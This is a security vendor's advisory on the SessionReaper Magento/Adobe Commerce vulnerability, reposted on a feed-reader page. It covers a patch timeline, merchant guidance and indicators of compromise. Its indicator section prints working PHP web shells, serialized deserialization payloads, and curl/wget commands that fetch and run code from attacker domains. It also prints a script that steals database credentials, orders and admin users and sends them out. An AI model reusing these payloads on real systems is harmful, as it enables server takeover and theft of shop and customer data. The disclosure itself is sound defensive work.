惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
GRAHAM CLULEY
V
V2EX
WordPress大学
WordPress大学
博客园 - Franky
Last Week in AI
Last Week in AI
博客园 - 司徒正美
有赞技术团队
有赞技术团队
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 【当耐特】
V
Visual Studio Blog
C
CERT Recently Published Vulnerability Notes
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Jina AI
Jina AI
Attack and Defense Labs
Attack and Defense Labs
腾讯CDC
The Hacker News
The Hacker News
Hugging Face - Blog
Hugging Face - Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
J
Java Code Geeks
人人都是产品经理
人人都是产品经理
阮一峰的网络日志
阮一峰的网络日志
T
Tailwind CSS Blog
S
SegmentFault 最新的问题
大猫的无限游戏
大猫的无限游戏
小众软件
小众软件
A
Arctic Wolf
量子位
博客园 - 聂微东
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
N
News and Events Feed by Topic
雷峰网
雷峰网
博客园_首页
Google Online Security Blog
Google Online Security Blog
Spread Privacy
Spread Privacy
罗磊的独立博客
H
Hacker News: Front Page
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
月光博客
月光博客
TaoSecurity Blog
TaoSecurity Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
博客园 - 三生石上(FineUI控件)
宝玉的分享
宝玉的分享
IT之家
IT之家
The Cloudflare Blog
爱范儿
爱范儿
博客园 - 叶小钗
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Apple Machine Learning Research
Apple Machine Learning Research
酷 壳 – CoolShell
酷 壳 – CoolShell

Sansec - experts in eCommerce security

GorgonAgora: 4,800+ fake storefronts skim cards across hundreds of impersonated brands Sansec adds support for Sylius 1 & 2 Critical vulnerability in Mirasvit Cache Warmer for Magento Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts Composer vulnerability leaks GitHub tokens, threatens PHP supply chain Over 200 PrestaShop stores expose installer, allowing full takeover ClickFix malware hits DoD cybersecurity vendor homepage SVG Onload Tag Hides Magecart Skimmer on 99 Stores Mass PolyShell attack wave hits 471 stores in one hour Novel WebRTC skimmer bypasses security controls at $100+ billion car maker PolyShell: unrestricted file upload in Magento and Adobe Commerce Digital skimmer hits global supermarket chain Building a faster YARA engine in pure Go Magento Developers Impersonated in Targeted GitHub Malware Operation Claude finds 353 zero-days on Packagist The billion-dollar security.txt problem Keylogger targets 200,000+ employees at major US bank ConnectPOS leaked Github secrets for years Critical backdoor found in MGT Varnish extension SessionReaper attacks have started, 3 in 5 stores still vulnerable Adobe patches critical Magento admin takeover via menu injection Backdoor found in popular ecommerce components Found defunct.dat on your site? You've got a problem. You have 2 weeks left to set up CSP for your store Merchants left guessing at last-minute PCI-DSS u-turn Magento Security Release APSB25-08 [Impact Analysis] Sorry, client-side security does not work Google services abused in skimming campaigns Thousands of Adobe Commerce stores hacked in competing CosmicSting campaigns CosmicSting attack & defense overview Persistent backdoors injected on Adobe Commerce via new CosmicSting attack CosmicSting attacks have started hitting major stores Polyfill supply chain attack hits 100K+ sites CosmicSting attack threatens 75% of Adobe Commerce stores Persistent Magento backdoor hidden in XML Sansec joins forces with Google's VirusTotal Sansec and Europol counter online skimming Magento wish list exploit bypasses WAF protection Is your store’s newsletter being used for phishing? Malware Persistence via Telegram and GitHub Postponed Exfiltration Evades Detection Sansec analysis: 12% of online stores leak private backups Vendors defeat Magento security patch (+ simple check) Fake Klaviyo accounts added to Magento Adobe Commerce merchants to be hit with TrojanOrders this season Extortion of Magento merchants Surge in Magento 2 template attacks Magento vendor Fishpig hacked, backdoors added Magento 2 critical vulnerability (CVE-2022-24086 & CVE-2022-24087) NaturalFreshMall: a Magento Mass Hack Magento and the Log4j vulnerability NginRAT parasite targets Nginx CronRAT malware hides behind February 31st New linux_avp malware hits eCommerce sites Case Study: How eCommerce Hackers Silently Steal Credit Card Data Google Apps Script used to steal data Fake payment page before checkout on Shopify and BigCommerce eCommerce trojan accidentally leaks victims Hackers exploit security flaw right before Black Friday Payment skimmer hides in social media buttons Cardbleed: 3% of Magento install base hacked North Korean hackers are skimming US and European shoppers Digital skimmer runs entirely on Google, defeats CSP Lockdown: Stores closed, online stores hacked Do these two things to keep your Magento 1 store running after June Magento 1 still PCI compliant after 1 July 2020? Sansec reveals longest Magecart skimming operation to date [Analysis] Maxcluster and Sansec partner to secure German stores Indonesian Magecart hackers arrested Payment skimmers have impersonated Sansec American Cancer Society hit by payment skimmer Magento security extentions vendor got hacked FBI recommends eCommerce malware protection Sansec at Europol training: 50,000+ stores hacked PCI-SSC/RHISAC quote Sansec: 20% stores reinfected Critical Magento 2 flaw exploited within 16 hours 57 payment gateways from Germany to Brazil targeted Sports brand Puma infected with advanced malware Credit cards of Atlanta Hawks fans stolen Bad extensions now main source of Magento hacks: a solution! Large sites hacked via Adminer database tool PHP tool 'Adminer' leaks passwords Competing digital skimmers sabotage each other Merchants struggle with MageCart reinfections Backdoor found in Webgility Unpublished security flaws (0days) massively exploited German political party store hacked before election MageCart: now with tripwire ABS-CBN next in series of high profile breaches Is your Google Analytics code malicious? MagentoCore group hacks 7,339 stores and counting Hackers breached Magento through helpdesk Cryptojacking found on 2496 online stores Why ordering HTTP headers is important Warning: fake Magento patch 9789 contains virus A Magento breach analysis: part 1 An OpenCart/Magento hacking dashboard Self-healing malware restores itself after deletion Visbot malware found on 6691 stores [analysis] Criminals have rewired 3,500 online stores
SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236)
Sansec Forensics Team · 2025-09-08 · via Sansec - experts in eCommerce security

In August 2025, a critical (CVSS 9.1) flaw was discovered in all versions of Adobe Commerce and Magento. The bug, named "SessionReaper" by Sansec, allows customer account takeover and unauthenticated remote code execution under certain conditions.

Adobe broke their regular release schedule to publish an emergency fix early September. However, Adobe downplayed the urgency by not mentioning that attackers may gain full control of your server. The vulnerability researcher who discovered CVE-2025-54236 confirmed this on Slack.

Also, Adobe did not patch the possibility for arbitrary file uploads, so if you have patched but are not running a specialized WAF, attackers may be able to upload malware to your server.

SessionReaper is one of the most severe Magento vulnerabilities in its history, comparable to Shoplift (2015), Ambionics SQLi (2019), TrojanOrder (2022) and CosmicSting (2024). Each time, thousands of stores got hacked in automated campaigns run by multiple threat actors.

Timeline

  • Aug 19th: Sansec adds SessionReaper protection to Shield.
  • Aug 22nd: Adobe accidentally leaks SessionReaper emergency fix
  • Sep 4th: Adobe privately announces emergency fix to selected Commerce customers
  • Sep 5th: Adobe adds partial filtering to its Fastly WAF.
  • Sep 9th: Adobe releases public emergency patch for SessionReaper - CVE-2025-54236 in APSB25-88 with priority 2 ("patch in 30 days").
  • Sep 19th: Ten days after patch release, fewer than 1 in 3 Magento stores has been patched. For Adobe Commerce Cloud, the figures are marginally better at 1 in 2.
  • Oct 14th: Adobe releases regular security patch APSB25-94 that includes the emergency fix
  • Oct 22nd: First attacks detected after a bug analysis was published by AssetNote.
  • Oct 23rd: Just 38% of stores have been patched.
  • Oct 24th: Mass attacks have reached about 31% of all Magento stores. Adobe confirms abuse and changes priority level to 1 (patch within 72 hours).
  • Oct 26th: Mass attacks have hit 49% of all stores, we estimate that 16-18% of all Magento stores now have one or more backdoors injected.
  • Nov 1st: 81% of all stores have been visited by a SessionReaper.

What should merchants do?

If you are already using Sansec Shield (included in our Advanced, Enterprise and Agency plans), you have been protected against this attack since early September. All versions of Shield give full protection, but make sure you are running Shield 1.0.14 or higher as that also blocks arbitrary uploads (not patched by Adobe yet).

If you are not using Sansec Shield, you should test and deploy the patch as soon as possible. Because the patch disables internal Magento functionality, chances are that some of your custom/external code will break. Adobe published a developer guide with instructions.

If you cannot safely apply the patch within the next 24 hours, you should activate a WAF for immediate protection. Only Sansec Shield blocks all known attacks. Fastly WAF (on Adobe Cloud) and Cloudflare block some attack vectors but not all.

If you did deploy the patch but not within 24 hours of publication, we recommend to run a malware scanner like eComscan to reveal any backdoors on your system. If you find those, you should rotate your secret crypt key, as leaking it would allow attackers to update your CMS blocks indefinitely.

To prevent attackers from uploading arbitrary files to your server, you can use Shield, disable the customer address upload controller, disable file system write permissions on pub/media/customer_address/*/*, or wait for Adobe to patch the issue. It is not sufficient to block requests to /customer/address_file/upload as there are multiple ways to reach the upload controller.

How the attack works

Our security team successfully reproduced one possible avenue to exploit SessionReaper, but there are likely multiple vectors. While we cannot disclose technical details that could aid attackers, the vulnerability follows a familiar pattern from last year's CosmicSting attack. The attack combines a malicious session with a nested deserialization bug in Magento's REST API.

The specific remote code execution vector appears to require file-based session storage. However, we recommend merchants using Redis or database sessions to take immediate action as well, as there are multiple ways to abuse this vulnerability.

Active exploitation via customer address form

Sansec tracks ecommerce attacks in real-time around the globe. On October 22nd - 6 weeks after initial publication - we observed the first mass attacks in the wild. PHP backdoors are uploaded via /customer/address_file/upload as a fake session. This happens regardless of patch installation, as Adobe only fixed the session deserialization bug, not the unrestricted file upload issue.

If you found these malicious session files but you did patch in time, you are most likely safe. However, we still recommend to remove these files and run a malware scan to see if the attack led to any backdoors throughout your code base.

Indicators of compromise

As of November 10th, we observed attack probes from dozens of IPs, but these are the most common:

23.146.184.93
23.249.27.221
34.227.25.4
44.212.43.34
45.32.66.51
45.143.20.147
46.39.230.243
54.205.171.35
54.226.181.219
80.78.25.213
86.203.185.51
99.246.176.115
103.215.237.26
141.11.62.221
143.244.44.172
149.28.33.250
155.117.84.134
155.138.226.245
156.244.16.170
157.245.52.111
159.89.12.166
198.144.182.13
212.8.248.191
2001:19f0:6000:9a28:5400:5ff:feb8:8b4b
2a0a:3840:8078:25:0:504e:19d5:1337

Malicious session files may contain code that stores generic PHP backdoors in static.php, bootstrap.php, sysapi.php, gsfa1faewf.txt and several others.

<?php
if (!hash_equals('4009d3fa8132195a2dab4dfa3affc8d2', md5(md5($_REQUEST['pass'] ?? '')))) {
    header('Location:404.php');
    exit;
}
system($_REQUEST['cmd']);
?>

Or simply:

<?php @eval($_REQUEST['cmdddddd']);?>

Most attacks use GuzzleHttp\Cookie\FileCookieJar as a serialized object with the GuzzleHttp\Cookie\SetCookie method.

In some cases it appears that the attacker is using a broken Eclipse on Windows setup to generate payloads, where the Eclipse error messages end up in the uploaded session file:

Warning: PHP Startup: Unable to load dynamic library 'bz2' (tried: E:\Tools\eclipse\php7.3\ext\bz2 (The specified module could not be found.), E:\Tools\eclipse\php7.3\ext\php_bz2.dll (The specified module could not be found.)) in Unknown on line 0

This seems to be a test (non-working) attempt

_|O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{S:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{S:4:"data";a:3:{S:7:"Expires";i:1;S:7:"Discard";b:0;S:5:"Value";S:6:"UfxEuF";}}}S:10:"strictMode";N;S:8:"filename";S:39:"./pub/media/customer_address/s/e/setest";S:19:"storeSessionCookies";b:1;}

However, this one works:

_|O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{S:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{S:4:"data";a:3:{S:7:"Expires";i:1;S:7:"Discard";b:0;S:5:"Value";S:125:"<?php http_response_code(404);ob_clean();if(isset($_POST['ZnFDBN'])){eval($_POST['ZnFDBN']);}?>404 error: Page not found.<!--";}}}S:10:"strictMode";N;S:8:"filename";S:20:"./pub/errors/404.php";S:19:"storeSessionCookies";b:1;}

Others appear to test for code execution, and then clean up after themselves:

<?php echo 'AEMgzb'; ; unlink(__FILE__);?>a
<?php echo 'BlUGUz'; ; unlink(__FILE__);?>a
<?php echo 'EcOCkX'; ; unlink(__FILE__);?>a
<?php echo 'FhUCRp'; ; unlink(__FILE__);?>a

// alternatively:
<?php phpinfo(); ; unlink(__FILE__);?>a

A backdoor using $_GET with backticks and short PHP syntax:

<?=`$_GET[cmd]`?>

This backdoor uses XOR encoding to hide its payload:

<?php
// decodes to eval($_GET['cmd']);
$xor = ("Jm7r" ^ "Dvof" ^ "km9x") . ("Ta" ^ "D1" ^ "8t") . ("xDwn" ^ "CIuN" ^ "dJGt") . ("7m" ^ "9r" ^ "U8") . ("G7j" ^ "R5K" ^ "voE") . ("IghA" ^ "XS30" ^ "6irJ");
eval($xor);

A more versatile backdoor that allows both exec and eval via $_GET parameters as well as file upload:

<?php
$A = 'e';
$B = 'x';
$C = 'e';
$D = 'c';
$X = $A . $B . $C . $D;
if (isset($_GET['q'])) print_r($X(base64_decode($_GET['q'])));
if (isset($_GET['p'])) eval(base64_decode($_GET['p']));
else phpinfo();
if (isset($_FILES['file'])) {
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    print_r('Upload Success..');
}

Other successful attempts add the attacker's pseudonym to a public file, for example pub/rootz.php with rootzwashere inside.

A common attack queries safecrafft.com/a.php?a=DOMAIN for code to run:

_|O:32:"Monolog\Handler\SyslogUdpHandler":1:{S:6:"socket";O:29:"Monolog\Handler\BufferHandler":7:{S:7:"handler";r:2;S:10:"bufferSize";i:-1;S:6:"buffer";a:1:{i:0;a:2:{i:0;S:65:"curl https://sagecrafft.com/a.php?a=https://www.XXX.com | php";S:5:"level";N;}}S:5:"level";N;S:11:"initialized";b:1;S:11:"bufferLimit";i:-1;S:10:"processors";a:2:{i:0;S:7:"current";i:1;S:10:"shell_exec";}}}

However, the sagecrafft.com/a.php URL is now unavailable, but previously it contained the following code, which retrieves the admin users and recent sales and reports it back to sagecrafft.com/ttt/ref.php:

<?php	function _log($s,$s2){
		$myCurl = curl_init();
		curl_setopt_array($myCurl, array(
			CURLOPT_URL => 'https://sagecrafft.com/ttt/ref.php',
// ...
));
		$response = curl_exec($myCurl);
		curl_close($myCurl);
	}



	$a=file_get_contents('app/etc/env.php');
	if(!$a){
		$a=file_get_contents('../app/etc/env.php');
	}
	$a=explode('return',$a);
	$a=eval('$b='.$a[1]);
	$b2=$b['backend'];
	$url_admin=$b2['frontName'];
	$b1=$b['db'];
	$_table_prefix=$b1['table_prefix'];
	$b1=$b1['connection'];
	$b1=$b1['default'];
	$_host=$b1['host'];
	$_dbname=$b1['dbname'];
	$_username=$b1['username'];
	$_password=$b1['password'];


$connect = mysqli_connect($_host, $_username, $_password, $_dbname);

$select = "SELECT * FROM ".$_table_prefix."sales_order WHERE created_at LIKE '%2025-09%'";
$get=mysqli_query($connect,$select);
$mas=array();
while($e=mysqli_fetch_array($get,MYSQLI_ASSOC)){
	$mas[]=$e;
}
$asd=count($mas);

$select = "SELECT * FROM ".$_table_prefix."quote_payment WHERE created_at LIKE '%2025-09%' AND `method` != 'NULL'";
$get=mysqli_query($connect,$select);
$mas=array();
while($e=mysqli_fetch_array($get,MYSQLI_ASSOC)){
	$mas[]=$e;
}
$asd2=count($mas);

$select = "SELECT * FROM `".$_table_prefix."admin_user`";
$get=mysqli_query($connect,$select);
$mas=array();
while($e=mysqli_fetch_array($get,MYSQLI_ASSOC)){
	$mas[]=$e;
}
$usr=print_r($mas,true);


_log('https://DOMAIN/'.$url_admin.'::IP::'.$_host.'::'.$_username.'::'.$_password.'::'.$_dbname.'::'.$_table_prefix.'::        '.$asd.'  '.$asd2,'([https://DOMAIN])'.$usr);
$connect->close();
?>

The sagecrafft.com burner domain has been replaced with worcksbot.com as of November 10th:

wget -O- https://worcksbot.com/w.php?a=https://www.DOMAIN | php

This will log the same information to https://worcksbot.com/o/o.php.

The following backdoors are a combined PHP executor and file uploader:

<?php
  echo 409723*20;
  if(md5($_COOKIE['d'])=='17028f487cb2a84607646da3ad3878ec'){
    echo'ok';
    eval(base64_decode($_REQUEST['id']));
    if($_POST['up']=='up') {
      @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);
    }
  }
?>
<?php $A = 'e';
$B = 'x';
$C = 'e';
$D = 'c';
$X = $A . $B . $C . $D;
if (isset($_GET['q'])) print_r($X(base64_decode($_GET['q'])));
if (isset($_GET['p'])) eval(base64_decode($_GET['p']));
else phpinfo();
if (isset($_FILES['file'])) {
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    print_r('Upload Success..');
}

Another malicious session tries to download a backdoor from tecnokauf.ru:

curl http://tecnokauf.ru/accesson20.html -o /var/www/vhosts/DOMAIN/htdocs/pub/6376bad677a8.php

This produces a PHP backdoor in pub/6376bad677a8.php:

<?php echo 409723*20;if(md5($_COOKIE['d'])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST['id']));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>

Acknowledgements

Sansec is not affiliated with Adobe and runs unbiased security research across the eCommerce ecosystem. Sansec protects 1 in 10 of all Magento stores worldwide.

Read more